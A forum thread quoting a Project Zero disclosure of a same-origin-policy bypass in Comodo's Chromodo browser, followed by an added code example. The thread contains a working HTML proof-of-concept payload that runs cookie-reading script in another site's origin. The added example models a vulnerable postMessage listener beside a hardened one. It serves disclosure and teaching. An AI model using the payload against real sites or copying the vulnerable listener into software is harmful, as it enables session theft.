Comodo Dragon Completely Disables All Browser Security

Discussion in 'other software & services' started by AutoCascade, Feb 2, 2016.

  1. AutoCascade

    From WidlbyDesign

    https://www.wilderssecurity.com/thre...ore-release-cicles.382607/page-3#post-2561395

    Note that this was marked closed because Comodo said they fixed it, but it wasn't really fixed, so a new issue, #713, was opened. I can't get to that issue, though; if someone else can, post it here. There are also other open issues mentioned for C Dragon.

    Tavis Ormandy (@taviso), 3 hours ago:
    Selling antivirus doesn't qualify you to fork chromium, you're going to screw it up.

    https://code.google.com/p/google-security-research/issues/detail?id=704

    When you install Comodo Internet Security, by default a new browser called Chromodo is installed and set as the default browser. Additionally, all shortcuts are replaced with Chromodo links and all settings, cookies, etc are imported from Chrome. They also hijack DNS settings, among other shady practices.

    https://www.comodo.com/home/browsers-toolbars/chromodo-private-internet-browser.php

    Chromodo is described as "highest levels of speed, security and privacy", but actually disables all web security. Let me repeat that: they ***disable the same origin policy***... ?!?

    To reproduce, do something like this:

    <html>
    <head></head>
    <body>
    <script>
    // Open a cross-origin site in a child window, wait for it to load, then
    // post it a JSON "execCode" command. The Chromodo-side listener runs the
    // supplied code inside the child window's origin, so the alert shows the
    // target site's cookies to the attacker's page. targetOrigin "*" means the
    // message is delivered regardless of which origin the child currently has.
    function steal_cookie(obj)
    {
        // Wait for the page to load
        setTimeout(function() {
            obj.postMessage(JSON.stringify({
                command: "execCode",
                code: "alert(document.cookie)"
            }), "*");
        }, 2000);
    }
    </script>
    <a href="javascript:steal_cookie(window.open('https://ssl.comodo.com/'))">Click Here</a>
    </body>
    </html>
    This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

    [Attachment: Windows 7 x86-2016-01-21-16-48-44.png]

    Jan 25, 2016 Project Member #1 tav...@google.com
    I've attached a working exploit for this issue. I haven't received an acknowledgement or response from Comodo, so I sent this reply:

    FYI, I still haven't got a response. The same origin policy is basically disabled for all of your customers, which means there is no security on the web... this is about as bad as it gets. If the impact isn't clear to you, please let me know.

    This vulnerability is bad enough to start paging people.

    [Attachment: exploit.html]

    Jan 29 (4 days ago) Project Member #2 tav...@google.com
    Comodo replied that they're planning a hotfix for this issue within a day, but the other open issues may take weeks to fix.

    I replied that I noticed their scan process is not using ASLR, which probably isn't a good sign going forward, and I'm planning to start a more thorough audit next week.

    Today (2 hours ago) Project Member #5 tav...@google.com
    It looks like Comodo pushed a change that removes the "execCode" API that I was using in my exploit.

    This is obviously an incorrect fix, and a trivial change makes the vulnerability still exploitable. After "discussion" with Comodo (I can't really get any response from them, but I'm trying), I'll consider this bug fixed and file a new bug with the trivial bypass of their fix as a new issue.

    The deleted comments above contained discussion about the bypass, I'll move them into a new issue.

    Project Member #6 tav...@google.com
    Discussion about the incorrect fix is in issue 713.
    Today (2 hours ago) Project Member #7 tav...@google.com
    (No comment was entered for this change.)
    Blocking: google-security-research:713
    Today (2 hours ago) #8 kobrasre...@gmail.com
    "After "discussion" with Comodo (I can't really get any response from them, but I'm trying)"

    Hopefully this being posted on HackerNews will help. If not, rampant exploitation of Comodo browsers ought to incentivize companies to cancel their subscriptions and Comodo will lose money.
    Today (62 minutes ago) #9 l33t...@gmail.com
    toppest of keks, my friend.

    There's plenty of evidence of the shadiness of Chromodo, it gets pushed via the kind of PUP bundler networks that also push winlocker trojans of Indian origin.
    Last edited: Feb 2, 2016
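The bug report above only shows the sending side of the channel (a page posting an "execCode" message to a cross-origin child window). The following is an added example, not Comodo's code and not Tavis's exploit: it models the receiving side as a message listener that a browser helper might inject into every page, first in the shape that produces this bug (any origin may send a command, and the command carries code that runs in the victim's origin), then in a hardened shape (sender origin checked against an allow list, message parsed defensively, dispatch only to a fixed command table with no code-execution command at all). The listener structure, the allowed origin, the command names and the victim cookie value are all assumptions made for illustration; it runs under Node without a browser by modelling the victim page's document as a plain object.

```javascript
// Added example, not code from the bug report or from Comodo.
// Models the receiver of the postMessage channel the exploit drives.

// Constructed victim page state: a stand-in for document.cookie in a page
// at an origin the attacker's page must not be able to read.
const victimDocument = { cookie: "session=4f3a9c; path=/" };

// What the victim-side helper does with code it is told to run. In a real
// browser this would be eval() or an injected <script> inside the victim
// page; Function() is used here so the model runs outside a browser.
function runInVictimOrigin(code) {
  return new Function("document", code)(victimDocument);
}

// Vulnerable pattern: no origin check, and the message itself carries the
// code to execute. A page at one origin can open any site in a child window
// and run script inside it, which is exactly a same-origin policy bypass.
function vulnerableListener(event) {
  const msg = JSON.parse(event.data);
  if (msg.command === "execCode") {
    return runInVictimOrigin(msg.code);
  }
  return undefined;
}

// Hardened pattern: allow-list the sender origin, parse defensively and
// dispatch only to a fixed table of commands that carry no code. There is
// deliberately no execCode entry; dropping one command name while keeping a
// generic "run what the message says" primitive would not close the hole.
const ALLOWED_ORIGINS = new Set(["https://ssl.comodo.com"]); // assumed allow list
const COMMANDS = Object.freeze({
  ping: () => "pong",      // hypothetical commands
  version: () => "1.0",
});

function hardenedListener(event) {
  if (!ALLOWED_ORIGINS.has(event.origin)) {
    return { ok: false, reason: "origin not allowed: " + event.origin };
  }
  let msg;
  try {
    msg = JSON.parse(event.data);
  } catch (e) {
    return { ok: false, reason: "malformed message" };
  }
  if (msg === null || typeof msg !== "object" || typeof msg.command !== "string") {
    return { ok: false, reason: "bad message shape" };
  }
  if (!Object.prototype.hasOwnProperty.call(COMMANDS, msg.command)) {
    return { ok: false, reason: "unknown command: " + msg.command };
  }
  return { ok: true, result: COMMANDS[msg.command]() };
}

// Constructed message as the victim window sees it. postMessage's
// targetOrigin "*" is a sender-side choice; the receiver always sees the
// sender's real origin in event.origin, which is what must be checked.
const attackerMessage = {
  origin: "https://attacker.example",
  data: JSON.stringify({ command: "execCode", code: "return document.cookie" }),
};

function demoVulnerable() {
  return vulnerableListener(attackerMessage); // leaks the victim cookie string
}

function demoHardened() {
  return hardenedListener(attackerMessage); // rejected at the origin check
}

function demoHardenedTrustedOrigin() {
  // Even an allowed origin cannot request code execution: execCode is not a command.
  return hardenedListener({
    origin: "https://ssl.comodo.com",
    data: JSON.stringify({ command: "execCode", code: "return document.cookie" }),
  });
}

function demoHardenedAllowed() {
  return hardenedListener({
    origin: "https://ssl.comodo.com",
    data: JSON.stringify({ command: "ping" }),
  });
}

console.log("vulnerable:", demoVulnerable());
console.log("hardened (attacker origin):", demoHardened());
console.log("hardened (trusted origin, execCode):", demoHardenedTrustedOrigin());
console.log("hardened (trusted origin, ping):", demoHardenedAllowed());
```

The point of the two listeners side by side is that the origin check and the removal of the code-carrying command are separate defences; either one missing leaves the attacker a path, and a real helper injected into every page needs both.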